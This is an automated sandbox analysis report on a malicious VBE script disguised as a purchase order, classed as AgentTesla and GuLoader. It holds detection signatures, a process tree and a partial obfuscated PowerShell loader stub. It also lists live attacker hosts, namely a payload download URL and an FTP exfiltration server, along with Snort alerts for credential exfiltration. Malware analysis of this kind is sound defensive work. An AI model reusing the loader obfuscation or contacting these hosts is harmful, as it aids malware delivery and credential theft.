Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name:PO-08784 xlsx.vbe
Analysis ID:755441
MD5:266115592f966240c14dfeeec624bdf5
SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 8268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 3416 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4432 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """[obfuscated payload string omitted]""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 1352 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
Source: PO-08784 xlsx.vbe, Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Author: Florian Roth, Strings:
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe
Source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

          Data Obfuscation

          Source: Process started, Author: Joe Security, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """[obfuscated payload string omitted]
          Timestamp:11/28/22-18:14:18.239839
          Source IP:192.168.11.20
          Destination IP:185.31.121.136
          SID:2029927
          Source Port:49807
          Destination Port:21
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:11/28/22-18:14:18.274476
          Source IP:192.168.11.20
          Destination IP:185.31.121.136
          SID:2851779
          Source Port:49808
          Destination Port:56411
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: http://pesterbdd.com/images/Pester.png, Avira URL Cloud: Label: malware
          Source: ftp.mcmprint.net, Virustotal: Detection: 9%
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: unknown, HTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Networking

          Source: Traffic, Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49807 -> 185.31.121.136:21
          Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknown, DNS query: name: api.ipify.org
          Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View, IP Address: 54.91.59.199
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0, Host: api.ipify.org, Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko, Host: b3solutionscws.com, Cache-Control: no-cache
          Source: global traffic, TCP traffic: 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknown, FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49807 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 19:14. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
          Source: unknown, Network traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000011.00000002.5824869400.000000000152A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000002.5900965300.000000001FC83000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmbImL.com
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.net
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.netXy
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknown, DNS traffic detected: queries for: b3solutionscws.com
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Code function: 17_2_1D5FA09A recv,17_2_1D5FA09A

          System Summary

          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """[obfuscated payload string omitted]
          Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 4705
          Source: PO-08784 xlsx.vbe, type: SAMPLE, Matched rule: WScript_Shell_PowerShell_Combo, date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB206 NtQuerySystemInformation, 17_2_1D5FB206
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB1D5 NtQuerySystemInformation, 17_2_1D5FB1D5
          Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (obfuscated command line)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAAB6 AdjustTokenPrivileges, 17_2_1D5FAAB6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAA7F AdjustTokenPrivileges, 17_2_1D5FAA7F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1
          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match File source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (obfuscated command line)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5CF89 pushad ; ret 4_2_00C5CF95
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C677C7 push es; ret 4_2_07C67810
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C625D3 push esp; iretd 4_2_07C625D9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6D5A0 push es; ret 4_2_07C6D5B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C61CA3 push eax; retf 4_2_07C61CA9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67B91 push es; ret 4_2_07C67BA0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67A9E push es; ret 4_2_07C67AB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6E8B0 push es; ret 4_2_07C6E8C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBCDA1 push es; retf 0007h 4_2_07CBCDA2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBF579 push esp; ret 4_2_07CBF57D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4D0 push ss; retf 0007h 4_2_07CBE4D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4F1 push ss; retf 0007h 4_2_07CBE4F2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB7348 push esp; iretd 4_2_07CB7351
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3C9B0 push es; ret 4_2_07D3CC90
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3BCF1 push es; ret 4_2_07D3BD00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3CC82 push es; ret 4_2_07D3CC90
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
